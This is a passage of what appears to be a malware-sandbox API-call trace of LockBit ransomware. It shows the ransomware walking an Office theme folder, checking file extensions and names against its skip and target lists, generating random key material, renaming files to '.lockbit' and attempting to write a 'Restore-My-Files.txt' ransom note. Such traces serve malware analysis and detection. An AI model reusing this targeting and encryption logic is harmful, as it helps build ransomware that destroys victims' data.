returned 0x753f1e2e [0195.162] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.162] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.167] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.167] malloc (_Size=0xc4) returned 0x1fa2ed8 [0195.167] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc4, FileInformationClass=0xa) returned 0x0 [0195.169] free (_Block=0x1fa2ed8) [0195.169] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.169] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.170] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.170] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c73700, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5b7e600, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x80c73700, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x8e301, dwReserved0=0x0, dwReserved1=0x0, cFileName="Newsprint.eftx", cAlternateFileName="NEWSPR~1.EFT")) returned 1 [0195.170] lstrcmpiW (lpString1=".", lpString2="Newsprint.eftx") returned -1 [0195.170] lstrcmpiW (lpString1="..", lpString2="Newsprint.eftx") returned -1 [0195.170] PathFindExtensionW (pszPath="Newsprint.eftx") returned=".eftx" [0195.170] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.170] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.170] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.170] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.170] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.170] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.170] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.170] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.170] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.170] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.170] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.170] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.170] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.170] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.170] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.170] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.170] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.170] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.171] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.171] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.171] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.171] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.171] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.171] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.172] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.172] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.172] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Newsprint.eftx") returned 1 [0195.172] lstrcmpiW (lpString1="ntldr", lpString2="Newsprint.eftx") returned 1 [0195.172] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Newsprint.eftx") returned 1 [0195.172] lstrcmpiW (lpString1="bootsect.bak", lpString2="Newsprint.eftx") returned -1 [0195.172] lstrcmpiW (lpString1="autorun.inf", lpString2="Newsprint.eftx") returned -1 [0195.172] lstrcmpiW (lpString1="thumbs.db", lpString2="Newsprint.eftx") returned 1 [0195.172] lstrcmpiW (lpString1="iconcache.db", lpString2="Newsprint.eftx") returned -1 [0195.172] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.172] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx") returned=".eftx" [0195.172] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.172] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.172] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.172] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.172] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.172] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.172] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.172] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.172] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.172] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.172] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.172] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.172] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.172] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.172] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.172] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.173] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.173] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.173] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.173] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.173] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.173] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0195.173] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.173] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.173] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.173] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.173] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.173] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.173] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx.lockbit") returned 90 [0195.173] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0195.175] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.175] malloc (_Size=0x40068) returned 0x3df0008 [0195.175] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=582401) returned 1 [0195.175] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.175] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.176] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.176] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.176] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.176] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.195] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.195] malloc (_Size=0xca) returned 0x1fa2ed8 [0195.195] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xca, FileInformationClass=0xa) returned 0x0 [0195.202] free (_Block=0x1fa2ed8) [0195.202] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.202] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.202] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.202] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21692700, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5ba4760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x21692700, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x8059, dwReserved0=0x0, dwReserved1=0x0, cFileName="Opulent.eftx", cAlternateFileName="OPULEN~1.EFT")) returned 1 [0195.202] lstrcmpiW (lpString1=".", lpString2="Opulent.eftx") returned -1 [0195.202] lstrcmpiW (lpString1="..", lpString2="Opulent.eftx") returned -1 [0195.202] PathFindExtensionW (pszPath="Opulent.eftx") returned=".eftx" [0195.202] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.202] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.203] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.203] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.203] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.203] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.203] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.203] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.203] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.203] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.203] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.203] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.203] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.203] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.203] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.203] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.203] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.203] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.203] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.203] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.203] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.203] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.203] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.203] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.203] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.203] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0195.203] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.203] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.204] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.204] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.204] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Opulent.eftx") returned 1 [0195.204] lstrcmpiW (lpString1="ntldr", lpString2="Opulent.eftx") returned -1 [0195.204] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Opulent.eftx") returned -1 [0195.204] lstrcmpiW (lpString1="bootsect.bak", lpString2="Opulent.eftx") returned -1 [0195.204] lstrcmpiW (lpString1="autorun.inf", lpString2="Opulent.eftx") returned -1 [0195.204] lstrcmpiW (lpString1="thumbs.db", lpString2="Opulent.eftx") returned 1 [0195.204] lstrcmpiW (lpString1="iconcache.db", lpString2="Opulent.eftx") returned -1 [0195.205] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\") returned="" [0195.205] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx") returned=".eftx" [0195.205] lstrcmpiW (lpString1=".rar", lpString2=".eftx") returned 1 [0195.205] lstrcmpiW (lpString1=".zip", lpString2=".eftx") returned 1 [0195.205] lstrcmpiW (lpString1=".7z", lpString2=".eftx") returned -1 [0195.205] lstrcmpiW (lpString1=".ckp", lpString2=".eftx") returned -1 [0195.205] lstrcmpiW (lpString1=".dacpac", lpString2=".eftx") returned -1 [0195.205] lstrcmpiW (lpString1=".db", lpString2=".eftx") returned -1 [0195.205] lstrcmpiW (lpString1=".db-shm", lpString2=".eftx") returned -1 [0195.205] lstrcmpiW (lpString1=".db-wal", lpString2=".eftx") returned -1 [0195.205] lstrcmpiW (lpString1=".db3", lpString2=".eftx") returned -1 [0195.205] lstrcmpiW (lpString1=".dbf", lpString2=".eftx") returned -1 [0195.205] lstrcmpiW (lpString1=".dbc", lpString2=".eftx") returned -1 [0195.205] lstrcmpiW (lpString1=".dbs", lpString2=".eftx") returned -1 [0195.205] lstrcmpiW (lpString1=".dbt", lpString2=".eftx") returned -1 [0195.205] lstrcmpiW (lpString1=".dbv", lpString2=".eftx") returned -1 [0195.205] lstrcmpiW (lpString1=".frm", lpString2=".eftx") returned 1 [0195.205] lstrcmpiW (lpString1=".mdf", lpString2=".eftx") returned 1 [0195.205] lstrcmpiW (lpString1=".mrg", lpString2=".eftx") returned 1 [0195.205] lstrcmpiW (lpString1=".mwb", lpString2=".eftx") returned 1 [0195.205] lstrcmpiW (lpString1=".myd", lpString2=".eftx") returned 1 [0195.205] lstrcmpiW (lpString1=".ndf", lpString2=".eftx") returned 1 [0195.205] lstrcmpiW (lpString1=".qry", lpString2=".eftx") returned 1 [0195.205] lstrcmpiW (lpString1=".sdb", lpString2=".eftx") returned 1 [0195.206] lstrcmpiW (lpString1=".sdf", lpString2=".eftx") returned 1 [0195.206] lstrcmpiW (lpString1=".sql", lpString2=".eftx") returned 1 [0195.206] lstrcmpiW (lpString1=".sqlite", lpString2=".eftx") returned 1 [0195.206] lstrcmpiW (lpString1=".sqlite3", lpString2=".eftx") returned 1 [0195.206] lstrcmpiW (lpString1=".sqlitedb", lpString2=".eftx") returned 1 [0195.206] lstrcmpiW (lpString1=".tmd", lpString2=".eftx") returned 1 [0195.206] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx.lockbit") returned 88 [0195.206] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0195.208] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.208] malloc (_Size=0x40068) returned 0x3df0008 [0195.208] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=32857) returned 1 [0195.208] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.208] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.209] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.209] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.209] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0195.214] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.214] malloc (_Size=0xc6) returned 0x1fa2ed8 [0195.214] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xc6, FileInformationClass=0xa) returned 0x0 [0195.216] free (_Block=0x1fa2ed8) [0195.217] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects") returned 1 [0195.217] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt") returned 88 [0195.217] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.217] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24fcae00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5bca8c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x24fcae00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xa8b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oriel.eftx", cAlternateFileName="ORIEL~1.EFT")) returned 1 [0195.217] lstrcmpiW (lpString1=".", lpString2="Oriel.eftx") returned -1 [0195.217] lstrcmpiW (lpString1="..", lpString2="Oriel.eftx") returned -1 [0195.217] PathFindExtensionW (pszPath="Oriel.eftx") returned=".eftx" [0195.217] lstrcmpiW (lpString1=".386", lpString2=".eftx") returned -1 [0195.217] lstrcmpiW (lpString1=".cmd", lpString2=".eftx") returned -1 [0195.217] lstrcmpiW (lpString1=".exe", lpString2=".eftx") returned 1 [0195.217] lstrcmpiW (lpString1=".ani", lpString2=".eftx") returned -1 [0195.217] lstrcmpiW (lpString1=".adv", lpString2=".eftx") returned -1 [0195.217] lstrcmpiW (lpString1=".theme", lpString2=".eftx") returned 1 [0195.217] lstrcmpiW (lpString1=".msi", lpString2=".eftx") returned 1 [0195.217] lstrcmpiW (lpString1=".msp", lpString2=".eftx") returned 1 [0195.217] lstrcmpiW (lpString1=".com", lpString2=".eftx") returned -1 [0195.217] lstrcmpiW (lpString1=".diagpkg", lpString2=".eftx") returned -1 [0195.217] lstrcmpiW (lpString1=".nls", lpString2=".eftx") returned 1 [0195.217] lstrcmpiW (lpString1=".diagcab", lpString2=".eftx") returned -1 [0195.217] lstrcmpiW (lpString1=".lock", lpString2=".eftx") returned 1 [0195.217] lstrcmpiW (lpString1=".ocx", lpString2=".eftx") returned 1 [0195.217] lstrcmpiW (lpString1=".mpa", lpString2=".eftx") returned 1 [0195.217] lstrcmpiW (lpString1=".cpl", lpString2=".eftx") returned -1 [0195.218] lstrcmpiW (lpString1=".mod", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".hta", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".icns", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".prf", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".rtp", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".diagcfg", lpString2=".eftx") returned -1 [0195.218] lstrcmpiW (lpString1=".msstyles", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".bin", lpString2=".eftx") returned -1 [0195.218] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".shs", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".drv", lpString2=".eftx") returned -1 [0195.218] lstrcmpiW (lpString1=".wpx", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".bat", lpString2=".eftx") returned -1 [0195.218] lstrcmpiW (lpString1=".rom", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".msc", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".spl", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".ps1", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".msu", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".ics", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".key", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".mp3", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".reg", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".dll", lpString2=".eftx") returned -1 [0195.218] lstrcmpiW (lpString1=".ini", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".idx", lpString2=".eftx") returned 1 [0195.218] lstrcmpiW (lpString1=".sys", lpString2=".eftx") returned 1 [0195.219] lstrcmpiW (lpString1=".hlp", lpString2=".eftx") returned 1 [0195.219] lstrcmpiW (lpString1=".ico", lpString2=".eftx") returned 1 [0195.219] lstrcmpiW (lpString1=".lnk", lpString2=".eftx") returned 1 [0195.219] lstrcmpiW (lpString1=".rdp", lpString2=".eftx") returned 1 [0195.219] lstrcmpiW (lpString1=".lockbit", lpString2=".eftx") returned 1 [0195.219] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Oriel.eftx") returned 1 [0195.219] lstrcmpiW (lpString1="ntldr", lpString2="Oriel.eftx") returned -1 [0195.219] lstrcmpiW (lpString1="ntuser.dat.log", 